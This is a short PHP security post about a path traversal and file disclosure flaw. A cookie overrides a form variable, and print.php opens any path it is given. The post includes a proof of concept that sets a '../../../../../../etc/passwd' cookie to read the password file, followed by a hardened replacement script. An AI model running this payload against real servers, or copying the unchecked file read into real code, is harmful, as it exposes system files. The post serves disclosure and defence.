#php exploit by Daniel Phoenix

synopsis: A problem exists where users can change the values of variables in forms by simply setting a cookie. I can only see this as a real problem where a programmer explicitly sets hidden fields he does not want the user to change.

Solution: Don't ever assume hidden fields are secure variables.

-------------------------------------example exploit----------------------------------------------
OK, first run form.php, hit enter, and it should open a file called list.txt.

OK, now run setcookie.php. Now it does not matter what you enter in the form, because the $test variable set in cookies will override anything passed from the form. Run the form again -- your password file comes up.

----------------------------------form.php---------------------------------------------------------
---------------------------------list.txt---------------------------------------------------------
test test test test test test test test test test

-------------------------------print.php---------------------------------------------------------
<?php
// $test is filled in from the request (form field or cookie) and used unchecked as the path
$myfile=fopen($test,"r");
fpassthru($myfile);
?>

------------------------------setcookie.php-----------------------------------------------------
<?php
setcookie("test","../../../../../../etc/passwd");
echo "cookie inserted";
?>
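
A hardened counterpart to print.php, added here as an example and not part of the original post: it reads the value from the POST body only, so a cookie named test is never consulted, and it confines the resolved path to one directory. The files directory, the use of POST by the form, and the resolve_requested_file helper are assumptions made for illustration.

```php
<?php
// Added example (not from the original post): hardened print.php.
// Assumption: servable files live in a "files" directory beside this script.
const BASE_DIR = __DIR__ . '/files';

/**
 * Map a client-supplied name to a real file inside $baseDir.
 * Returns the canonical path, or null if the name is unusable
 * or resolves outside the directory.
 */
function resolve_requested_file(string $name, string $baseDir): ?string
{
    // Empty names and embedded NUL bytes are never valid file names.
    if ($name === '' || strpos($name, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses "../" sequences and symlinks, and returns
    // false when the target does not exist.
    $path = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($path === false || !is_file($path)) {
        return null;
    }
    // Confinement: the canonical path must still start with the base directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Take the value from one explicit source. Cookies and query strings
// cannot override it because they are never read.
$requested = $_POST['test'] ?? '';
$path = is_string($requested)
    ? resolve_requested_file($requested, BASE_DIR)
    : null;

if ($path === null) {
    http_response_code(400);
    exit('invalid file');
}

header('Content-Type: text/plain');
readfile($path);
```

With this version, posting test=list.txt returns the list, while a value such as ../../../../../../etc/passwd, whether it arrives in the form or in a cookie, gets a 400 response.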